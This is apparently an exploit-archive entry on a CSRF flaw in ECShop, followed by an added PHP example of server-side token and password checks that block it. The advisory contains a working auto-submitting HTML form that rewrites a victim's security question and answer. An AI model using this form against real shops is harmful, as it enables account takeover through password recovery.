ECShop CSRF vulnerability allowing modification of any user's password: exploit

ID MYHACK58:62201028027
Type myhack58
Reporter Anonymous
Modified 2010-10-05T00:00:00


ECShop's authentication mechanism has a design flaw that allows a malicious user to steal another user's password. This can be achieved through XSS and CSRF.

Exploit (exp):

<html>
<body>
<form action="" method="POST">
<INPUT TYPE="text" NAME="email" value="">
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
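
The form above posts email, sel_question and passwd_answer with act=act_edit_profile and carries neither a per-session token nor the current password. The following is an added example, not ECShop's code and not part of the original advisory, of a server-side check that rejects such a cross-site request; the function names, the csrf_token and current_password fields and the session layout are assumptions.

```php
<?php
// Added example, not ECShop code. Function names, the csrf_token and
// current_password fields and the session layout are assumptions; act, email,
// sel_question and passwd_answer are the field names used by the form above.

// Issue one unpredictable token per session. The legitimate profile page puts
// it in a hidden field, which a page served from another origin cannot read.
function issue_csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether an act_edit_profile request may change account-recovery data.
function may_edit_profile(array $session, array $post, string $passwordHash): bool {
    $sent  = $post['csrf_token'] ?? '';
    $known = $session['csrf_token'] ?? '';
    // Reject when no token was issued or the submitted one differs (constant-time compare).
    if (!is_string($sent) || $known === '' || !hash_equals($known, $sent)) {
        return false;
    }
    // E-mail and security question/answer feed password recovery, so the
    // current password is required again even inside a logged-in session.
    $current = $post['current_password'] ?? '';
    return is_string($current) && password_verify($current, $passwordHash);
}

// Constructed demo data: a logged-in session and the stored password hash.
$session = ['user_id' => 7];
$hash    = password_hash('correct horse', PASSWORD_DEFAULT);
$token   = issue_csrf_token($session);

// Same fields as the auto-submitting form: no token, no current password.
$forged = ['act' => 'act_edit_profile', 'email' => '',
           'sel_question' => 'ecshop', 'passwd_answer' => 'exploit'];
// Request from the site's own profile page, filled in by the user.
$legit = ['act' => 'act_edit_profile', 'email' => 'user@example.com',
          'sel_question' => 'ecshop', 'passwd_answer' => 'my answer',
          'csrf_token' => $token, 'current_password' => 'correct horse'];

printf("cross-site form accepted: %s\n", var_export(may_edit_profile($session, $forged, $hash), true));
printf("same-site form accepted:  %s\n", var_export(may_edit_profile($session, $legit, $hash), true));
```

The token alone does not help where the page's XSS route applies, since a script running in the site's own origin can read the hidden field; the current-password requirement is what still blocks the change in that case.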